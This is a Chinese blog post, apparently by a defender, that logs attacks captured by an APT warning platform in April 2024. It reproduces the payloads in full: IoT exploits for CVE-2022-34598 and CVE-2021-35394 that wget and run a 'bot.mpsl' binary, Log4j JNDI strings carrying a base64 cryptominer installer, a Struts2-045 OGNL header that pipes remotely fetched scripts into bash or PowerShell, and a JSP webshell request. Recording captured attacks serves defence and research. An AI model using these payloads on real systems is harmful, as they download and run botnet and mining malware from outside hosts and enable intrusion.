APT预警攻击平台截获Nday
2024年4月26日
设备漏洞【漏洞利用】H3C Magic R100任意代码执行漏洞(CVE-2022-34598)
0000 :
0010 :
0020 :
0030 :
0040 :
0050 :
0060 :
0070 :6F 72 66 3B 63 64 20 2F 74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73 65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78 20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E 32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D 70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F 74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70 73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;
设备漏洞【漏洞利用】Realtek SDK UPnP任意命令注入漏洞(CVE-2021-35394)
0000 :
0010 :
0020 :
0030 :
0040 :
0050 :
0060 :
0070 :6F 72 66 3B 63 64 20 2F 74 6D 70 3B 20 72 6D 20
2D 72 66 20 6D 69 70 73 65 6C 3B 20 2F 62 69 6E
2F 62 75 73 79 62 6F 78 20 77 67 65 74 20 68 74
74 70 3A 2F 2F 35 31 2E 32 35 34 2E 31 35 36 2E
32 35 2F 62 6F 74 2E 6D 70 73 6C 3B 20 63 68 6D
6F 64 20 2B 78 20 62 6F 74 2E 6D 70 73 6C 3B 20
2E 2F 62 6F 74 2E 6D 70 73 6C 20 72 6B 73 70 6C
6F 69 74 3B 20 23 0Aorf;cd /tmp; rm
-rf mipsel; /bin
/busybox wget ht
tp://51.254.156.
25/bot.mpsl; chm
od +x bot.mpsl;
远程代码执行【WEB攻击】Apache Log4j2 任意代码执行漏洞(CVE-2021-44228)
请求内容
authorization=&login.timezone=GMT+8:00&province=&city=&rectangle=&login_username=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://colj0qcsjrgk9u7maq0gby3pkekxh7uyo.oast.pro}
外带信息
{"oob": {"domain": "146.59.16.84", "protocol": "tcp"}}
请求:
http://xxx.xxx.xxx.xxx:9092/t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
请求头
Accept: application/json, text/plain, */*
X-Api-Version: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//146.59.16.84:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
User-Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-
命令注入【WEB攻击】Struts2-045远程命令执行漏洞(CVE-2017-5638)
外带信息
{"oob": {"domain": "87.121.105.232", "protocol": "tcp"},"relation": {"cmd": "curl"}}
请求头
Host: xxx.xx.xxx.xxxx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="(curl -s http://0x5778549c/i || wget -q -O - http://0x5778549c/i || lwp-download http://0x5778549c/i /dev/shm/i) | bash -sh; bash /dev/shm/i; rm -rf /dev/shm/i; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJyB8fCBweXRob24yIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8weDU3Nzg1NDljL3kiKS5yZWFkKCkpJw== | base64 -d | bash -").(#cmd1="powershell iex(New-Object Net.WebClient).DownloadString('http://87.121.105.232/bin.ps1')").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{"cmd.exe","/c",#cmd1}:{"/bin/bash","-c",#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Content-Length: 0
信息泄露【WEB攻击】检测到探测服务器config.json文件
这个竟然成功了,经排查,不过没啥影响
http://xxx.xx.xxx.xxx:xxxx/sxxyxxn/common/cap4/template/base/conditions/config.json
命令注入【WEB攻击】检测到系统命令注入攻击(ipconfig)
外带信息
{"relation": {"cmd": "ipconfig"}}
一句话木马
http://xxx.xxx.xxxx.xxxx:xxxx/seeyon/qweasdzxc.jsp?pwd=0&i=ipconfig
响应头
Content-Type: text/html
Content-Length: 537
Date: Sat, 27 Apr 2024 16:32:31 GMT
Connection: close
Server: SY8045
唉
使用注意事项)
)
![[学习笔记] Android综合_2024-4-30](http://pic.xiahunao.cn/[学习笔记] Android综合_2024-4-30)
微调SFT实战Meta-Llama-3-8B-Instruct)
守护大众健康)
的简介、安装和使用方法、案例应用之详细攻略)
